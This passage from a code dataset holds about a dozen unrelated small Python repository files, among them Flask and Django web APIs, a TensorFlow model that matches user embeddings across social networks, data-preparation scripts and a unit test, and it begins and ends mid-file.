    # Set success text + background color to green, lock button and input field\n
    label.setStyleSheet(u\"color: rgb(49, 255, 3);\")\n
    label.setText(QCoreApplication.translate(\"MainWindow\", u\"Success\", None))\n
    button.setStyleSheet(u\"background-color: rgb(49, 255, 3);\")\n\n
    # update progress bar and validation locally\n
    scenario.calculateProgress(scenario.current, scenario.steps)\n
    updateProgressBar(self, scenario)\n\n
    disableUI(self)\n\n
#########################################\n
## Method to calculate the current step\n
#########################################\n
def calculateCurrent(self, scenario):\n
    for step in scenario.validations:\n
        if step.completed == \"false\":\n
            scenario.current = step.id\n
            break  # resume at the first unfinished step\n\n
def disableUI(self):\n
    # allow user to proceed to the next step\n
    self.ui.bt_next.setEnabled(True)\n
    # lock button and input field\n
    self.ui.bt_submit.setEnabled(False)\n
    self.ui.lineEdit.setReadOnly(True)\n\n
def enableUI(self):\n
    # unlock button and input field\n
    self.ui.bt_submit.setEnabled(True)\n
    self.ui.lineEdit.setReadOnly(False)\n\n
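# The per-scenario progress bars are attached to self.ui dynamically via setattr()\n
# in generateCards2, which is what lets them be looked up by object name below.\n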
def updateProgressBar(self, scenario):\n
    bar = getattr(self.ui, \"progressBar_\" + str(scenario.id), None)\n
    if bar is not None:\n
        bar.setValue(scenario.progress)\n
","repo_name":"harbingerr/Validation-System","sub_path":"validation system desktop app/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":13802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"37786533423","text":"import ast\nimport shutil\nfrom io import StringIO\nfrom contextlib import contextmanager\n\n\n
@contextmanager\n
def optional_file_open(optional_path, *args, **kwargs):\n
    \"\"\"Open a fileobj pointing to a file or a StringIO obj if None.\n
    Argument:\n
    :optional_path: A path to open. If None, a StringIO obj is used.\n\n
    Optional Arguments:\n
    :close: (default False) If the object is a fileobj, indicates whether it\n
        should be closed at the end.\n
    \"\"\"\n
    close = kwargs.pop('close', False)\n
    if optional_path:\n
        fp = open(optional_path, *args, **kwargs)\n
    else:\n
        fp = StringIO()\n
    try:\n
        yield fp\n
    finally:\n
        if optional_path and close:\n
            fp.close()\n\n\n
def is_valid_python_code(code):\n
    try:\n
        ast.parse(code)\n
    except SyntaxError:\n
        return False\n
    return True\n\n\n
def _email_txt_file_to_python_set(txt_path, result_path=None, validate=True,\n
                                  set_variable_name='INVALID_DOMAIN_SETS'):\n
    \"\"\"Turns a multiline text file into a valid Python set.\n
    \"\"\"\n
    sio = StringIO()\n
    with open(txt_path, 'r') as origin:\n
        sio.write('%s = {' % set_variable_name)\n\n
        for line in origin:\n
            sio.write(\"'{}', \".format(line.strip()))\n\n
        sio.write('}')\n
    sio.seek(0)\n
    if validate and not is_valid_python_code(sio.read()):\n
        raise ValueError('Python Code Invalid. Check original file')\n\n
    sio.seek(0)\n
    if result_path:\n
        with open(result_path, 'w') as fp:\n
            shutil.copyfileobj(sio, fp)\n
        sio.close()\n
    return sio\n\n\n
if __name__ == '__main__':\n
    _email_txt_file_to_python_set(\n
        'throwaway_domains.txt', 'invalid_domains.py')\n
","repo_name":"santiagobasulto/lambda-email-verifier","sub_path":"code_utils.py","file_name":"code_utils.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"1176521125","text":"import json\nimport sys\n\n
def main():\n
\topen('static/final.txt', 'w').close()\n
\tfile = open('static/final.txt', 'a+')\n\n
\tfbFriends = []\n
\tfriends = []\n
\tfollowers = []\n
\tcommon = []\n
\tcommonUgly = []\n
\tnumberCommon = 0\n\n
\tdata = openFile('static/fbFriends.json')\n
\tfor criteria in data['data']:\n
\t\tfor key, value in criteria.items():\n
\t\t\tif key == \"name\":\n
\t\t\t\t# print(key, 'is:', value)\n
\t\t\t\tfbFriends.append(value)\n
\t\t# print('')\n
\t# print(fbFriends)\n\n
\tdata = openFile('static/friends.json')\n
\tfor users in data['users']:\n
\t\tfor criteria in users:\n
\t\t\tfor key, value in criteria.items():\n
\t\t\t\tif key == \"name\":\n
\t\t\t\t\t# print(key, 'is:', value)\n
\t\t\t\t\tfriends.append(value)\n
\t\t\t\tif key == \"screen_name\":\n
\t\t\t\t\tfriends.append(value)\n
\t\t\t# print('')\n
\t# print(friends)\n\n
\tdata = openFile('static/followers.json')\n
\tfor users in data['users']:\n
\t\tfor criteria in users:\n
\t\t\tfor key, value in criteria.items():\n
\t\t\t\tif key == \"name\":\n
\t\t\t\t\t# print(key, 'is:', value)\n
\t\t\t\t\tfollowers.append(value)\n
\t\t\t\tif key == \"screen_name\":\n
\t\t\t\t\tfollowers.append(value)\n
\t\t\t# print('')\n
\t# print(followers)\n\n
\tfor amigo in fbFriends:\n
\t\ttempAmigo = ''.join(e for e in amigo if e.isalnum())\n
\t\ttempAmigo = tempAmigo.lower()\n
\t\tfor van in friends:\n
\t\t\ttempVan = ''.join(e for e in van if e.isalnum())\n
\t\t\ttempVan = tempVan.lower()\n
\t\t\tif tempAmigo == tempVan:\n
\t\t\t\t# print('Found one: ' + 
amigo)\n\t\t\t\tcommon.append(amigo)\n\t\t\t\tcommonUgly.append(tempAmigo)\n\t\t\t\tnumberCommon = numberCommon + 1\n\n\tfor amigo in fbFriends:\n\t\ttempAmigo = ''.join(e for e in amigo if e.isalnum())\n\t\ttempAmigo = tempAmigo.lower()\n\t\tfor van in followers:\n\t\t\ttempVan = ''.join(e for e in van if e.isalnum())\n\t\t\ttempVan = tempVan.lower()\n\t\t\tif tempAmigo == tempVan:\n\t\t\t\tif tempAmigo not in commonUgly:\n\t\t\t\t\t# print('Found one: ' + amigo)\n\t\t\t\t\tcommon.append(amigo)\n\t\t\t\t\tnumberCommon = numberCommon + 1\n\t\t\t\t# else:\n\t\t\t\t# \tprint('Found duplicate: ' + amigo)\n\n\tnewCommon= []\n\n\tif numberCommon > 0:\n\t\tfor i in common:\n\t\t\tif i not in newCommon:\n\t\t\t\tnewCommon.append(i)\n\t\t\telse:\n\t\t\t\tnumberCommon = numberCommon - 1\n\t\tprint(\"\\n Friends in common: \" + str(newCommon))\n\t\tprint(\"\\n Number of friends in common: \" + str(numberCommon))\n\telse:\n\t\tprint(\"\\n No friends in common found...\")\n\tfile.write(str(newCommon) + \"\\n\")\n\tfile.write(str(numberCommon) + \"\\n\")\n\n\tfbLocation = \"\"\n\thometown = \"\"\n\tlocation = \"\"\n\tdata = openFile('static/userData.json')\n\ttry:\n\t\tfbLocation = data[\"location\"][\"name\"]\n\t\tfbLocation = fbLocation.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\ttry:\n\t\thometown = data[\"hometown\"][\"name\"]\n\t\thometown = hometown.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\n\tdata = openFile('static/user.json')\n\ttry:\n\t\tlocation = data[\"location\"]\n\t\tlocation = location.split(',', 1)[0]\n\texcept KeyError:\n\t\tpass\n\n\tif location == fbLocation or location == hometown:\n\t\tprint(\"\\n Common location found: \" + location)\n\t\tfile.write(location + \"\\n\")\n\telse:\n\t\tprint(\"\\n No common location found...\")\n\t\tfile.write(\"\")\n\ndef openFile(f):\n\ttry:\n\t\tdata = json.load(open(f))\n\t\treturn data\n\texcept FileNotFoundError:\n\t\tprint(f + \" not found\")\n\t\tsys.exit()\n\nif __name__ == \"__main__\":main()\n","repo_name":"AntoineChwat/SAS","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14372041741","text":"import unittest\nfrom csrv.model import cards\nfrom csrv.model.cards import corp\nfrom csrv.model import deck\nfrom csrv.model import game\nfrom csrv.model import premade_decks\nfrom csrv.model import test_base\nfrom csrv.model import timing_phases\nfrom csrv.model.cards.runner import card01006\n\n\nclass Card01006Test(test_base.TestBase):\n\n def setUp(self):\n test_base.TestBase.setUp(self)\n self.card = card01006.Card01006(self.game, self.game.runner)\n self.game.runner.clicks.set(4)\n self.game.runner.credits.set(5)\n self.game.runner.grip.add(self.card)\n self.game.insert_next_phase(\n timing_phases.RunnerTurnActions(self.game, self.game.runner))\n\n def tearDown(self):\n self.card.trash()\n\n def test_install_card01006(self):\n self.assertIn(\n self.card.install_action, self.game.current_phase().choices())\n self.game.resolve_current_phase(self.card.install_action, None)\n self.assertEqual(6, self.game.runner.free_memory)\n\n def test_card01006_adds_virus_counter(self):\n self.game.runner.rig.add(self.card)\n virus = [c for c in self.runner.stack.cards if c.NAME == 'Card01008'][0]\n self.game.runner.rig.add(virus)\n self.assertEqual(1, virus.virus_counters)\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","repo_name":"mrroach/CentralServer","sub_path":"csrv/model/cards/runner/card01006_test.py","file_name":"card01006_test.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
{"seq_id":"36121466641","text":"#!/usr/bin/python\n#coding=utf-8\n\nimport json\n\nimport urllib2\n\n
if __name__ == '__main__':\n
    url = u\"https://api.douban.com/v2/book/search?q=python\"\n
    response = urllib2.urlopen(url)\n\n
    response_str = response.read()\n
    # parse the JSON string into a dict\n
    response_dic = json.loads(response_str)\n
    count = response_dic['count']\n
    total = response_dic['total']\n
    print(count)\n
    print(total)","repo_name":"sfSanfrod/LearnPython","sub_path":"testSyntax/sendRequest.py","file_name":"sendRequest.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"9710118589","text":"from rest_framework import permissions\n\n
class UpdateOwnProfile(permissions.BasePermission):\n
    \"\"\"Permission that only lets users edit their own profile\"\"\"\n\n
    def has_object_permission(self, request, view, obj):\n
        \"\"\"Check whether the user is trying to edit their own profile\"\"\"\n
        if request.method in permissions.SAFE_METHODS:\n
            return True\n\n
        return obj.id == request.user.id\n\n
class UpdateOwnStatus(permissions.BasePermission):\n
    \"\"\"Permission that only lets users update their own feed\"\"\"\n\n
    def has_object_permission(self, request, view, obj):\n
        \"\"\"Check whether the user is trying to update their own status\"\"\"\n
        if request.method in permissions.SAFE_METHODS:\n
            return True\n\n
        return obj.user_profile.id == request.user.id","repo_name":"Ianphantom/profiles-rest-api","sub_path":"profiles_api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"72179836964","text":"from flask import Flask, jsonify, request\nimport pyodbc\n\n
app = Flask(__name__)\n\n
server = '(local)'\n
database = 'BooksAFewHundred'\n
username = 'Ted'\n
password = 'book'\n\n
conn = pyodbc.connect(\n
    'DRIVER={SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + username + ';PWD=' + password)\n\n\n
@app.route('/books/<string:genre>', methods=['GET'])\n
def get_books_by_genre(genre):\n
    cursor = conn.cursor()\n
    query = 'SELECT ISBN, Name FROM Book WHERE ' \\\n
            'Genre = ?'\n
    cursor.execute(query, genre)\n
    rows = cursor.fetchall()\n\n
    result = []\n
    for row in rows:\n
        item = {\n
            'Name': row[1],\n
        }\n
        result.append(item)\n\n
    return jsonify(result)\n\n\n
@app.route('/books/top-sellers', methods=['GET'])\n
def get_top_sellers():\n
    cursor = conn.cursor()\n
    query = 'SELECT TOP 10 ISBN, Name FROM Book ' \\\n
            'ORDER BY CopiesSold DESC'\n
    cursor.execute(query)\n
    rows = cursor.fetchall()\n\n
    result = []\n
    for row in rows:\n
        item = {\n
            'Name': row[1],\n
        }\n
        result.append(item)\n\n
    return jsonify(result)\n\n\n
@app.route('/books/rating', methods=['GET'])\n
def get_books_by_rating():\n
    rating = request.args.get('rating')\n
    if rating is None:\n
        return jsonify({'error': 'Rating parameter is missing.'}), 400\n\n
    try:\n
        rating = int(rating)\n
    except ValueError:\n
        return jsonify({'error': 'Rating must be an integer.'}), 400\n\n
    cursor = conn.cursor()\n
    query = 'SELECT b.Name FROM Rating r LEFT JOIN Book b ON b.ISBN = r.BookID WHERE Rating >= ?'\n
    cursor.execute(query, rating)\n
    rows = cursor.fetchall()\n\n
    result = []\n    for row in rows:\n        
item = {\n 'Name': row[0],\n }\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/books/discount', methods=['PUT', 'PATCH'])\ndef discount_books_by_publisher():\n data = request.get_json()\n discount_percent = data.get('discount_percent')\n publisher = data.get('publisher')\n\n if not discount_percent or not publisher:\n return jsonify({'error': 'Discount percent and publisher are required parameters.'}), 400\n\n try:\n discount_percent = float(discount_percent)\n except ValueError:\n return jsonify({'error': 'Discount percent must be a valid number.'}), 400\n\n cursor = conn.cursor()\n query = 'Update book set Price = (Price - (Price * ?)) FROM Book b LEFT JOIN Publisher p ON b.PublisherID = ' \\\n 'p.PublisherID WHERE p.PublisherID = ?'\n cursor.execute(query, discount_percent, publisher)\n conn.commit()\n\n return jsonify({'message': 'Books discounted successfully.'})\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"varb24/Group5","sub_path":"pycharm/flaskBooks/Sprint4VersionCC.py","file_name":"Sprint4VersionCC.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"334645447","text":"from src.m_utils import constants as cts\nfrom src.base.data_loaders.data_loader import DataLoader, DLName\n\nclass IMFDB_DL(DataLoader):\n def __init__(self, aligned):\n super().__init__(DLName.IMFDB, aligned, f'{cts.BASE_PATH}/indian_facial_db/database/Version 1/Images', True)\n self.set_dirs_paths()\n super().set_output_path()\n super().load_data_df()\n \n def set_dirs_paths(self):\n self.train_dirs_paths = [self.dataset_path]\n self.test_dirs_paths = []\n \n","repo_name":"guilhermemg/nas_v1","sub_path":"project/src/base/data_loaders/imfdb_loader.py","file_name":"imfdb_loader.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16209849918","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"project-etl\",\n version=\"0.1.0\",\n author=\"Prosperia Social\",\n author_email=\"developers.etl@prosperia.ai\",\n maintainer=\"Rodrigo Lara Molina\",\n maintainer_email=\"rodrigo@prosperia.ai\",\n description=\"A template library for procedures specific to every project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.7',\n)","repo_name":"AlejandroCoronadoN/mepyd-incluia","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21248712006","text":"import struct\nimport unittest\n\nimport plash_core\nimport plash.env\nimport plash.namespace\n\n\nclass FsOpTest(unittest.TestCase):\n\n def test_exec(self):\n fs_op = plash.namespace.make_fs_op(plash.env.get_root_dir())\n input_args = [\"arg1\", \"argument2\", \"x\"]\n filename, argv, exec_fds = \\\n fs_op.fsop_exec(\"/bin/echo\", [\"argv0\"] + input_args)\n # The start part of the result argv depends on ld.so location,\n # so we only check the end.\n self.assertEquals(argv[-len(input_args):], input_args)\n for argv_index, fd in exec_fds:\n assert 
isinstance(argv_index, int)\n
            assert isinstance(fd, plash_core.FD)\n\n\n
if __name__ == \"__main__\":\n
    unittest.main()\n
","repo_name":"mseaborn/plash","sub_path":"plash/tests/fsop_test.py","file_name":"fsop_test.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
{"seq_id":"11367330750","text":"import tensorflow as tf\nimport numpy as np\nimport os\nfrom gensim.models.keyedvectors import KeyedVectors\n\n
data_path = os.path.abspath('..') + '/data/'\n
# we used gensim (a handy tool) to produce the embedding vectors; for privacy\n
# protection we only provide the embedding data itself\n
twitter_embedding_path = data_path + 'twitter_embedding.emb'\n
twitter_vocab_path = data_path + 'twitter_model.vocab'\n
foursquare_embedding_path = data_path + 'foursquare_embedding.emb'\n
foursquare_vocab_path = data_path + 'foursquare_model.vocab'\n
# there are 3148 anchor users in the data set: 2098 users for training, 1050 users for testing\n
connect_data_path = data_path + 'trainConnect.txt'\n
connect_test_data_path = data_path + 'testConnect.txt'\n
# in this simplified version, we train our model directly\n
# connect_warm_up_data_path = data_path + 'trainConnect_400_warm_up.txt'\n
# our embedding size is 800\n
embedding_size = 800\n
# load the embedding vectors using gensim\n
x_vectors = KeyedVectors.load_word2vec_format(foursquare_embedding_path, binary=False, fvocab=foursquare_vocab_path)\n
y_vectors = KeyedVectors.load_word2vec_format(twitter_embedding_path, binary=False, fvocab=twitter_vocab_path)\n
inputs = []  # train input vectors\n
labels = []  # train label vectors\n
test_inputs = []  # test input vectors\n
test_labels = []  # test label words\n\n\n
def load_data():\n
    f = open(connect_data_path)\n
    for line in f.readlines():\n
        line_array = line.strip().split(' ')\n
        if line_array[0] not in x_vectors.vocab.keys() or line_array[1] not in y_vectors.vocab.keys():\n
            print(\"======================warning!!! \" + line_array[0] + \" or \" + line_array[\n
                1] + \" does not exist!!!=====================================\")\n
            continue\n
        inputs.append(x_vectors[line_array[0]])\n
        labels.append(y_vectors[line_array[1]])\n
    print('input size:' + str(len(inputs)))\n
    print('labels size:' + str(len(labels)))\n\n\n
# this function can be replaced by tf.layers.dense in newer TensorFlow versions\n
def add_layer(input_data, in_size, out_size, activation_function=None):\n
    weights = tf.Variable(tf.random_normal([in_size, out_size]))\n
    biases = tf.Variable(tf.zeros([1, out_size]) + 0.1)\n
    result = tf.matmul(input_data, weights) + biases\n
    if activation_function is None:\n
        outputs = result\n
    else:\n
        outputs = activation_function(result)\n
    return outputs\n
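\n# e.g. the network below builds hidden_1 = add_layer(xs, embedding_size, 1200, None);\n
# passing an activation such as tf.nn.relu would turn it into a standard dense layer\n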
\n\n# record the current data index\n
data_index = 0\n\n\n
# note that len(inputs) == len(labels)\n
def generate_batch(type):\n
    \"\"\"\n
    get the batch data\n
    :param type: train or test\n
    :return: batch data\n
    \"\"\"\n
    global data_index\n
    if type == 'train':\n
        if data_index + batch_size >= len(inputs):  # the case where data_index + batch_size exceeds the total data\n
            batch_inputs = inputs[data_index:]\n
            batch_labels = labels[data_index:]\n
            data_index = batch_size - len(batch_inputs)\n
            for d in inputs[:data_index]:\n
                batch_inputs.append(d)\n
            for l in labels[:data_index]:\n
                batch_labels.append(l)\n
        else:\n
            batch_inputs = inputs[data_index:data_index + batch_size]\n
            batch_labels = labels[data_index:data_index + batch_size]\n
            data_index += batch_size\n
        return batch_inputs, batch_labels\n
    elif type == 'test':\n
        f = open(connect_test_data_path)\n
        for line in f.readlines():\n
            line_array = line.strip().split(' ')\n
            if line_array[0] not in x_vectors.vocab.keys() or line_array[1] not in y_vectors.vocab.keys():\n
                print(\"======================warning!!! \" + line_array[0] + \" or \" + line_array[\n
                    1] + \" does not exist!!!=====================================\")\n
                continue\n
            test_inputs.append(x_vectors[line_array[0]])\n
            test_labels.append(line_array[1])\n
        print('test_inputs size:' + str(len(test_inputs)))\n
        print('test_labels size:' + str(len(test_labels)))\n
        return test_inputs\n\n\n
def normalize_vector(vector):\n
    norm = tf.sqrt(tf.reduce_sum(tf.square(vector), 1, keep_dims=True))\n
    normalized_embeddings = vector / norm\n
    return normalized_embeddings\n\n\n
# get the Levenshtein distance\n
def leven_dis(str1, str2):\n
    len_str1 = len(str1.lower()) + 1\n
    len_str2 = len(str2.lower()) + 1\n
    # create matrix\n
    matrix = [0 for n in range(len_str1 * len_str2)]\n
    # init x axis\n
    for i in range(len_str1):\n
        matrix[i] = i\n
    # init y axis\n
    for j in range(0, len(matrix), len_str1):\n
        if j % len_str1 == 0:\n
            matrix[j] = j // len_str1\n\n
    for i in range(1, len_str1):\n
        for j in range(1, len_str2):\n
            if str1[i - 1] == str2[j - 1]:\n
                cost = 0\n
            else:\n
                cost = 1\n
            matrix[j * len_str1 + i] = min(matrix[(j - 1) * len_str1 + i] + 1,\n
                                           matrix[j * len_str1 + (i - 1)] + 1,\n
                                           matrix[(j - 1) * len_str1 + (i - 1)] + cost)\n\n
    return matrix[-1]\n\n\n
def rank(topn, target):\n
    result = []\n
    for item in topn:\n
        max_length = len(item[0]) if len(item[0]) > len(target) else len(target)\n
        modify_value = ((max_length / 2.0 - leven_dis(item[0], target) * 1.0) / (max_length / 2.0)) * 0.05\n
        val = item[1] + modify_value\n
        if val > 1.0:\n
            val = 1.0\n
        if val < 0:\n
            val = 0\n
        result.append((item[0], val))\n
    result = sorted(result, key=lambda x: x[1], reverse=True)\n
    return result\n\n\n
# build the network\n
xs = tf.placeholder(tf.float32, [None, embedding_size])\n
ys = tf.placeholder(tf.float32, [None, embedding_size])\n
hidden_1 = add_layer(xs, embedding_size, 1200, None)\n
output_x = add_layer(hidden_1, 1200, embedding_size, None)\n
results = tf.matmul(normalize_vector(ys), normalize_vector(output_x), transpose_b=True)\n
loss_x = 1 - tf.reduce_mean(tf.diag_part(results))\n
train_step_x = tf.train.GradientDescentOptimizer(1).minimize(loss_x)\n
init = tf.global_variables_initializer()\n
num_steps = 2000001\n
# the data set is small, so we use a small batch size\n
batch_size = 1\n\n
with tf.Session() as session:\n
    print(\"program begin\")\n
    init.run()\n
    load_data()\n
    batch_size = 1\n
    average_loss = 0\n
    for step in range(num_steps):\n
        batch_inputs, batch_labels = generate_batch('train')\n
        feed_dict = {xs: batch_inputs, ys: batch_labels}\n
        loss_val, _ = session.run([loss_x, train_step_x], feed_dict=feed_dict)\n
        average_loss += loss_val\n
        if step % 2000 == 0:\n
            if step > 0:\n
                average_loss /= 2000\n
            print(\"Average loss_x at step \", step, \": \", average_loss)\n
            average_loss = 0\n
        if step % 20000 == 0:\n
            test_inputs = []\n
            test_labels = []\n
            prediction = session.run(output_x, feed_dict={xs: generate_batch('test')})\n
            count = 0\n
            total = np.zeros(101)\n
            for vector in prediction:\n
                number_in_topn = 0\n
                topn = y_vectors.similar_by_vector(vector=vector, topn=100)\n
                rank_result = rank(topn, test_labels[count])\n
                for item in rank_result:\n
                    number_in_topn += 1\n
                    if item[0] == test_labels[count]:\n
                        index = number_in_topn\n
                        while index < 101:\n
                            total[index] += 1\n
                            index += 1\n
                count += 1\n
            for i in range(1, 101):\n
                if i in [1, 5, 10, 15, 30, 100]:\n
                    print('top ' + str(i) + ' : ' 
+ str(total[i] / count))\n
","repo_name":"KDD-HIEPT/DeepLink","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"}
{"seq_id":"28887499632","text":"from Game import *\ngame = Game()\n\n
# This module functions as the driver for the game.\n
while game.gamestatus() is False:\n
    print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n
    game.displaymap()\n
    print(\"\\n What would you like to do? \")\n
    print(\" You can move up 'u', down 'd', left 'l', and right 'r'\")\n
    ui = input(\"\\n\\tEnter your choice: \")\n
    game.moveplayer(ui)\n
    if game.checkplayerathouse():\n
        game.startbattle()\n
    game.checkwin()\n
if game._gamewon is True:\n
    print(\"You won!\")\n
else:\n
    print(\"You lost!\")","repo_name":"Starskii/HalloweenRPG","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"29879644436","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n
lsbgs = 'random_LSBGs_all.csv'\n
artifacts_2 = 'random_negative_all_2.csv'\n\n
# load csv\n
df_lsbgs = pd.read_csv(lsbgs)\n
df_artifacts_2 = pd.read_csv(artifacts_2)\n
cols = ['ra', 'dec']\n\n
# drop unwanted cols\n
df_lsbgs = df_lsbgs[cols]\n
df_artifacts_2 = df_artifacts_2[cols]\n\n
# set labels\n
df_lsbgs['label'] = 1\n
df_artifacts_2['label'] = 0\n\n
# concatenate and shuffle final dataframe\n
df = pd.concat([df_lsbgs, df_artifacts_2])\n
df = df.sample(frac=1).reset_index(drop=True)\n\n
# split train, validation and test sets according to Tanoglidis\n
df_train, df_other = train_test_split(df, test_size=0.25)\n
df_val, df_test = train_test_split(df_other, test_size=0.5)\n\n
print('train:\\n', df_train['label'].value_counts(), '\\n')\n
print('val:\\n', df_val['label'].value_counts(), '\\n')\n
print('test:\\n', df_test['label'].value_counts(), '\\n')\n\n
df_train.to_csv('train.csv')\n
df_val.to_csv('val.csv')\n
df_test.to_csv('test.csv')\n
","repo_name":"zysymu/Deepfuse","sub_path":"data/prepare_csv.py","file_name":"prepare_csv.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"}
{"seq_id":"3649392477","text":"from flask import jsonify, make_response, abort\n\n
ARRAY_PRODUTOS = {\n
    \"1\": {\n
        \"NomeDoProduto\": \"Arroz\",\n
        \"ID\": \"1\",\n
        \"Valor\": \"5\",\n
        \"IdCategoria\": \"1\",\n
    },\n
    \"2\": {\n
        \"NomeDoProduto\": \"Detergente\",\n
        \"ID\": \"2\",\n
        \"Valor\": \"3\",\n
        \"IdCategoria\": \"2\",\n
    },\n
    \"3\": {\n
        \"NomeDoProduto\": \"Camiseta\",\n
        \"ID\": \"3\",\n
        \"Valor\": \"30\",\n
        \"IdCategoria\": \"3\",\n
    },\n
}\n\n
def read_all():\n
    dict_produtos = [ARRAY_PRODUTOS[key] for key in sorted(ARRAY_PRODUTOS.keys())]\n
    produtos = jsonify(dict_produtos)\n
    qtd = len(dict_produtos)\n
    content_range = \"produtos 0-\" + str(qtd) + \"/\" + str(qtd)\n
    # configure response headers\n
    produtos.headers['Access-Control-Allow-Origin'] = '*'\n
    produtos.headers['Access-Control-Expose-Headers'] = 'Content-Range'\n
    produtos.headers['Content-Range'] = content_range\n
    return produtos\n\n
def read_one(ID):\n
    if ID in ARRAY_PRODUTOS:\n
        produto = ARRAY_PRODUTOS.get(ID)\n
    else:\n
        abort(\n
            404, \"Product with ID {ID} not found\".format(ID=ID)\n
        )\n
    return produto\n\n\n
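# NOTE: ARRAY_PRODUTOS is a plain in-memory dict, so every change below is lost\n
# on restart and is not shared between server processes.\n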
def create(produto):\n
    NomeDoProduto = produto.get(\"NomeDoProduto\", None)\n
    ID = produto.get(\"ID\", None)\n
    Valor = produto.get(\"Valor\", None)\n
    IdCategoria = produto.get(\"IdCategoria\", None)\n\n
    if ID not in ARRAY_PRODUTOS and ID is not None:\n
        ARRAY_PRODUTOS[ID] = {\n
            \"NomeDoProduto\": NomeDoProduto,\n
            \"ID\": ID,\n
            \"Valor\": Valor,\n
            \"IdCategoria\": IdCategoria,\n
        }\n
        return make_response(\n
            \"{ID} successfully created\".format(ID=ID), 201\n
        )\n
    else:\n
        abort(\n
            406,\n
            \"Product with ID {ID} already exists\".format(ID=ID),\n
        )\n\n\n
def update(ID, produto):\n
    if ID in ARRAY_PRODUTOS:\n
        ARRAY_PRODUTOS[ID][\"ID\"] = produto.get(\"ID\")\n
        ARRAY_PRODUTOS[ID][\"Valor\"] = produto.get(\"Valor\")\n
        ARRAY_PRODUTOS[ID][\"NomeDoProduto\"] = produto.get(\"NomeDoProduto\")\n
        ARRAY_PRODUTOS[ID][\"IdCategoria\"] = produto.get(\"IdCategoria\")\n
        return ARRAY_PRODUTOS[ID]\n
    else:\n
        abort(\n
            404, \"Product with ID {ID} not found\".format(ID=ID)\n
        )\n\n
def delete(ID):\n
    if ID in ARRAY_PRODUTOS:\n
        del ARRAY_PRODUTOS[ID]\n
        return make_response(\n
            \"{ID} successfully deleted\".format(ID=ID), 200\n
        )\n
    else:\n
        abort(\n
            404, \"Product with ID {ID} not found\".format(ID=ID)\n
        )","repo_name":"EspeditoJunior/trabalhoDocker","sub_path":"projeto mercado inteligente/mercado_venv/mercado_inteligente/produtos.py","file_name":"produtos.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"41295686844","text":"from django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom os import path\n\nimport website.settings as settings\nfrom .models import Upload, Output\nfrom .forms import DocumentForm, handle_uploaded_file\n\n
# Create your views here.\n
def index(request):\n
\tif request.method == 'POST' and request.FILES:\n
\t\tform = DocumentForm(request.POST, request.FILES)\n
\t\tif form.is_valid():\n
\t\t\ttry:\n
\t\t\t\tuploaded_file = request.FILES['file']\n
\t\t\t\tfile = Upload(document=uploaded_file, file_name=uploaded_file.name)\n
\t\t\t\tfile.save()\n
\t\t\t\tnew_doc = handle_uploaded_file(uploaded_file)\n
\t\t\t\toutput_file = Output(document=new_doc, file_name=new_doc.name, original_file=file)\n
\t\t\t\toutput_file.save()\n
\t\t\t\treturn HttpResponseRedirect(f'download/{output_file.id}')\n
\t\t\texcept Exception:\n
\t\t\t\treturn HttpResponse('File conversion failed.', status=500)\n\n
\telse:\n
\t\tform = DocumentForm()\n
\tlatest_uploads = Upload.objects.order_by('-uploaded_at')[:10]\n
\tcontext = {\n
\t\t'latest_uploads': latest_uploads,\n
\t\t'form': form\n
\t}\n
\treturn render(request, 'converter/index.html', context)\n\n
def download(request, file_id):\n
\tfile = get_object_or_404(Output, pk=file_id)\n
\trelative_path = f'{file.document}'\n
\tfile_path = path.join(settings.MEDIA_ROOT, relative_path)\n
